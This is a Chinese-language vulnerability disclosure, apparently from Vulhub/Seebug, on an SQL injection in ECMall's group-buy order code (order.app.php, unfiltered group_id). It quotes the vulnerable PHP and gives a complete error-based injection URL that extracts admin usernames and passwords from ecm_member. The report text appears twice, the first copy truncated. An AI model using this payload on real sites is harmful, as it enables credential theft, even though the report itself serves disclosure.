VULHUB ™

### 简要描述： 没有看到补丁，应该没有补吧 ### 详细说明： 漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤 ``` function _clear_goods($order_id) { switch ($_GET['goods']) { case 'groupbuy': /* 团购的商品 */ $model_groupbuy =& m('groupbuy'); $model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array( 'order_id' => $order_id, ));//这里没有对$_GET['group_id']进行过滤 break; } } ``` ### 漏洞证明： 首先参加一个团购活动，当团购活动结束后，点击购买 [<img src="https://images.seebug.org/upload/201401/150947279d07df91349d0bb1f489eccda2c78cad.png" alt="t0140787235ff0effad.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/150947279d07df91349d0bb1f489eccda2c78cad.png) 点下一步时，更改当前网址如：http://192.168.1.1:8000/ecmall/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by...

### 简要描述： 没有看到补丁，应该没有补吧 ### 详细说明： 漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤 ``` function _clear_goods($order_id) { switch ($_GET['goods']) { case 'groupbuy': /* 团购的商品 */ $model_groupbuy =& m('groupbuy'); $model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array( 'order_id' => $order_id, ));//这里没有对$_GET['group_id']进行过滤 break; } } ``` ### 漏洞证明： 首先参加一个团购活动，当团购活动结束后，点击购买 [<img src="https://images.seebug.org/upload/201401/150947279d07df91349d0bb1f489eccda2c78cad.png" alt="t0140787235ff0effad.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/150947279d07df91349d0bb1f489eccda2c78cad.png) 点下一步时，更改当前网址如：http://192.168.1.1:8000/ecmall/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23 [<img src="https://images.seebug.org/upload/201401/15094828c70c178be4ef1a4c4c3a8bc205cb0307.png" alt="t018946aaac63adb74c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15094828c70c178be4ef1a4c4c3a8bc205cb0307.png) 然后点击"下单完成并支付"将会出现注入信息，如管理员账号密码等 [<img src="https://images.seebug.org/upload/201401/15094900477bd4462b5f4ce29d041c5704bf6a11.png" alt="t018b2e61988452dfa6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15094900477bd4462b5f4ce29d041c5704bf6a11.png)